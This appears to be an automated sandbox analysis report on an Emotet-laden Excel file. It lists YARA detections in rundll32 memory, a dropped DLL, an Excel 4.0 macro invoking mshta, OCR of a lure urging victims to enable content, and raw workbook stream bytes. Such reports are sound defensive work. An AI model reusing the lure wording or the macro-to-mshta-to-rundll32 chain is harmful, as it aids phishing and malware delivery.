                            Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a50000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2960000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3c0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b40000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30f0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.430000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2290000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2270000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30c0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.990000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.960000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f90000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2960000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.960000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a20000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d20000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b40000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3c0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ae0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ea0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ea0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.29f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2290000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3120000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.520000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e70000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c90000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22e0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ab0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2260000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c40000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a20000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2ee0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d20000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c90000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f30000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2270000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3100000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3100000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ae0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.920000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: 2022-28-01_1202.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: 2022-28-01_1202.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Document contains OLE streams with names of living off the land binaries
                            Source: 2022-28-01_1202.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Source: 2022-28-01_1202.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... 